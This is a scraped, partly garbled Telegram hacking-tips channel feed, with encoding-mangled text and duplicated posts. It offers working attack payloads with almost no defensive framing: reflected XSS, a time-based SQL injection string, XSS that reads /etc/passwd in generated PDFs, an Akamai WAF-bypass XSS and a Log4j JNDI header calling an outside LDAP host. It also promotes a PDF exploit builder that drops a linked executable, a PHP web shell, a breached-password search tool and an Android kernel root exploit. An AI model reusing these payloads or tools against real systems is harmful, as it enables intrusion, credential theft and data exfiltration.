๐ซ๐ฆ๐ฆ ๐ถ๐ป ๐๐ต๐ฒ .๐ฐ๐๐ ๐จ๐ฅ๐ ๐ฝ๐ฎ๐๐ต
๐ข๐ฟ๐ถ๐ด๐ถ๐ป๐ฎ๐น ๐จ๐ฅ๐:
๐ซ๐ฆ๐ฆ ๐๐ผ๐๐ป๐ฑ ๐ถ๐ป:
#BugBounty #Tips
โ โ โ โ โ โ โ โ โ โ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
๐ข๐ฟ๐ถ๐ด๐ถ๐ป๐ฎ๐น ๐จ๐ฅ๐:
"target/lib/css/animated.min.css"๐ซ๐ฆ๐ฆ ๐๐ผ๐๐ป๐ฑ ๐ถ๐ป:
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3๐3๐ฅ3โก1๐ฏ1
This is very cool. Get cheatsheets in your terminal with a curl command!
โจ๏ธ Try this:
#Tips
โ โ โ โ โ โ โ โ โ โ
๐ฃ T.me/BugCod3
๐ฃ T.me/LearnExploit
curl https://cht.sh/sqlmap#Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
โค3๐3โก1๐ฅ1๐ฏ1
LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.
In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.
Requirements:
pip install -r requirements.txtLeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]BugCod3#Python #Search #Parse #Password
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ3โค2โก1๐1๐ฏ1
POC Pdf-exploit builder on C#
Exploitable versions: Foxit Reader, Adobe Acrobat V9(maybe).
Put your exe-link and build the PDF-FILE
BugCod3#C #PDF #Exploit
Please open Telegram to view this post
VIEW IN TELEGRAM
โก3๐ฅ3โค2๐2
p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.
โ โ)Tab key)cd command)upload <destination_file_name> command)download <file_name> command)Demo with Docker:
docker build -t p0wny .
docker run -it -p 8080:80 -d p0wny
# open with your browser http://127.0.0.1:8080/shell.php
BugCod3#PHP #Shell #Pentesting
Please open Telegram to view this post
VIEW IN TELEGRAM
๐ฅ3โก2โค1
If you find Web frameworks like Symfony, add
to the wordlist, and you may get juicy data.
#BugBounty #Tips
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
'/app_dev.php/_profiler/open?file=app/config/parameters.yml'to the wordlist, and you may get juicy data.
#BugBounty #Tips
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
๐ฅ5โก2โค1
Tip for Stored XSS Bypass on Profile Uploader:
+add magic number (jpg , jpeg)
+bypass file extention Protection
Magic Number
#BugBounty #Tips
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
+add magic number (jpg , jpeg)
+bypass file extention Protection
Magic Number
#BugBounty #Tips
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
โก8โค1๐1
Canarytokens
You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.
Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.
๐ Site
#Pentesting #BugBounty
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
You'll be familiar with web bugs, the transparent images which track when someone opens an email. They work by embedding a unique URL in a page's image tag, and monitoring incoming GET requests.
Imagine doing that, but for file reads, database queries, process executions or patterns in log files. Canarytokens does all this and more, letting you implant traps in your production systems rather than setting up separate honeypots.
๐ Site
#Pentesting #BugBounty
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
โก5
This media is not supported in your browser
VIEW IN TELEGRAM
Translate JavaScript to other writing systems!
Site
ฮYใญIแใณฮ ๐พ
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
Site
ฮYใญIแใณฮ ๐พ
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
โค2โก2๐ฅ1
LFI Vulnerability Testing: Key Parameters
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
โก2โค1๐ฅ1
For 0Day SQLI in
(app extension)
payload was:
#BugBounty #Tips
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
(app extension)
payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/#BugBounty #Tips
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
โค2โก1๐1๐ฅ1
XSS to Exfiltrate Data from PDFs
How to use:
Server Side XSS (Dynamic PDF)
#XSS #PDF
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(โGETโ,โfile:///etc/hostsโ);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(โGETโ,โfile:///etc/passwdโ);x.send();</script>How to use:
Server Side XSS (Dynamic PDF)
#XSS #PDF
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
๐ฅ3โค2โก1
โโโ(BugCod3ใฟkali)-[~]
โโ$ sudo rm -rf *1402
โโโ(BugCod3ใฟkali)-[~]
โโ$ sudo mkdir 1403#Notification #NewYear
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
โค5โก1๐ฅ1
If you are testing API, before fuzzing observe these:
1. Does it throw same data for /v1/user and /v1/user
2. Is it case sensitive?
/v1/user => 200 OK
/v1/USER => 200 OK
OR
/v1/user => 200 OK
/v1/User => 404
How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.
#BugBounty #Tips
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
1. Does it throw same data for /v1/user and /v1/user
2. Is it case sensitive?
/v1/user => 200 OK
/v1/USER => 200 OK
OR
/v1/user => 200 OK
/v1/User => 404
How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.
#BugBounty #Tips
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
๐3โค1โก1๐ฅ1
Akamai WAF bypass XSS
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
#BugBounty #Tips
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
โก1โค1๐ฅ1
Log4j ๐ Application was running java
Vulnerable header :
#BugBounty #Tips #Security
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
Vulnerable header :
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}
#BugBounty #Tips #Security
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
โก1โค1๐ฅ1
Easy P1 ๐ฅ
Add to your wordlist
#BugBounty #Tips
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
Add to your wordlist
/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2#BugBounty #Tips
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
โค1โก1๐ฅ1
Mali GPU Kernel LPE
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
Pixel 7 Pro:
Pixel 7 Pro:
Pixel 7:
Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the
Github
โฌ๏ธ Download
๐
#C #Exploit #Android #Kernel #Pixel
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
google/husky/husky:14/UD1A.231105.004/11010374:user/release-keysPixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keysPixel 7 Pro:
google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keysPixel 7:
google/panther/panther:14/UP1A.231105.003/11010452:user/release-keysVulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the
gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.Github
โฌ๏ธ Download
๐
BugCod3#C #Exploit #Android #Kernel #Pixel
โโโโโโโโโโ
๐ค T.me/BugCod3BOT
๐ฃ T.me/BugCod3
โค1โก1๐1๐ฅ1